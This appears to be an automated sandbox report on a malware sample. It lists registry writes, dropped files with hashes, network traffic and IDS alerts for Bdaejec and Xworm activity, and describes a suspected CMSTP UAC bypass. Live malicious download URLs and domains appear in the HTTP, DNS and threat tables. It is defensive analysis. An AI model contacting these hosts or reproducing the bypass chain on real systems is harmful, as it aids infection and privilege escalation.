PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: ConsoleTracingMask | Value: (empty in the export)
PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: MaxFileSize | Value: 1048576
PID 4400 cmstp.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\CMSTP | Operation: write | Name: FileDirectory | Value: %windir%\tracing
PID 5244 dllhost.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\cmmgr32.exe | Operation: write | Name: ProfileInstallPath | Value: C:\ProgramData\Microsoft\Network\Connections\Cm
PID 5956 mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | Operation: write | Name: CachePrefix | Value: (empty in the export)
PID 5956 mshta.exe | Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | Operation: write | Name: CachePrefix | Value: Cookie:
Executable files: 6
Suspicious files: 5
Text files: 51
Unknown types: 0

Dropped files

PID | Process | Filename | Type, with MD5 and SHA256 on the following line

5376 | MasonGod.exe | C:\Windows\Temp\ydnhwr1y.inf | text
  MD5: 31037F84E1B357F1B5B236998FAC2A80 | SHA256: 92F59D57EE00005BDF845366330BE857D5175C94AF18D480A4E2B3FD3AC1CF4C
4400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hybwqikq.llm.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2s2jfg1a.fiy.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4400 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
  MD5: AC9B62B953350C9F16CE003945F3238A | SHA256: B7408FF76FA30857D9309F95E518FCF46184E404F1BDE435B8200B966367982E
4400 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_n0zrrrt1.4pi.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6752 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ndyvf1x1.cnk.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4740 | x69Install.exe | C:\Users\admin\AppData\Local\Temp\iyMbXS.exe | executable
  MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96 | SHA256: 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
340 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_wjljrbgc.xcj.ps1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_nlkqxnhl.gre.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
340 | powershell.exe | C:\Windows\Temp\__PSScriptPolicyTest_v4uojygl.thn.psm1 | text
  MD5: D17FE0A3F47BE24A6453E9EF58C94641 | SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Two of these rows matter for triage: the .inf written to C:\Windows\Temp by the first MasonGod.exe instance (PID 5376) is consistent with the "Probably UAC bypass using CMSTP.exe" signature, since cmstp.exe (PID 4400) and the CMSTPLUA COM server follow it directly in the behavior graph; and iyMbXS.exe, written by x69Install.exe (PID 4740), is the Bdaejec component that later fetches the .rar files from ddos.dnsnb8.net. The __PSScriptPolicyTest_*.ps1/.psm1 files (all with the same hash) are PowerShell's own script-policy probe files, written at every PowerShell start, not payloads.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 30
DNS requests: 17
Threats: 8

HTTP requests

Columns as in the report: PID | Process | Method | HTTP code | IP | URL | CN | Type | Size | Reputation. Cells that are empty in the export (PID and process for the first two rows, HTTP code for the two .rar downloads) are omitted.

GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
GET | 200 | 2.16.168.114:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
6632 | iyMbXS.exe | GET | 3.229.117.57:799 | http://ddos.dnsnb8.net:799/cj//k2.rar | unknown | malicious
6632 | iyMbXS.exe | GET | 3.229.117.57:799 | http://ddos.dnsnb8.net:799/cj//k1.rar | unknown | malicious
2040 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
2040 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Connections

Columns as in the report: PID | Process | IP | Domain | ASN | CN | Reputation. Cells that are empty in the export are omitted; rows without a PID continue the preceding process.

4 | System | 192.168.100.255:137 | whitelisted
2104 | svchost.exe | 51.124.78.146:443 | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
51.124.78.146:443 | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
2.16.168.114:80 | crl.microsoft.com | Akamai International B.V. | RU | whitelisted
95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted
4 | System | 192.168.100.255:138 | whitelisted
2112 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 4.213.25.241:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
6544 | svchost.exe | 40.126.32.76:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
google.com
  • 142.250.186.46
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
client.wns.windows.com
  • 4.213.25.241
whitelisted
login.live.com
  • 40.126.32.76
  • 20.190.160.128
  • 20.190.160.4
  • 40.126.32.72
  • 40.126.32.136
  • 20.190.160.20
  • 40.126.32.74
  • 40.126.32.140
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted
ddos.dnsnb8.net
  • 3.229.117.57
malicious

Threats

PID | Process | Class | Message

2196 | svchost.exe | Misc activity | SUSPICIOUS [ANY.RUN] Domain previously seen in multiple payload deliveries (ddos .dnsnb8 .net)
2196 | svchost.exe | A Network Trojan was detected | MALWARE [ANY.RUN] Suspected domain Associated with Malware Distribution (.ply .gg)
2196 | svchost.exe | Misc activity | ET TA_ABUSED_SERVICES Tunneling Service in DNS Lookup (* .ply .gg)
2196 | svchost.exe | Potentially Bad Traffic | ET INFO playit .gg Tunneling Domain in DNS Lookup
6760 | x69s.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm TCP Initial Packet
6760 | x69s.exe | Malware Command and Control Activity Detected | REMOTE [ANY.RUN] Xworm TCP Initial Packet
6632 | iyMbXS.exe | A Network Trojan was detected | BACKDOOR [ANY.RUN] Bdaejec Backdoor (download .rar)
6632 | iyMbXS.exe | A Network Trojan was detected | BACKDOOR [ANY.RUN] Bdaejec Backdoor (download .rar)
No debug info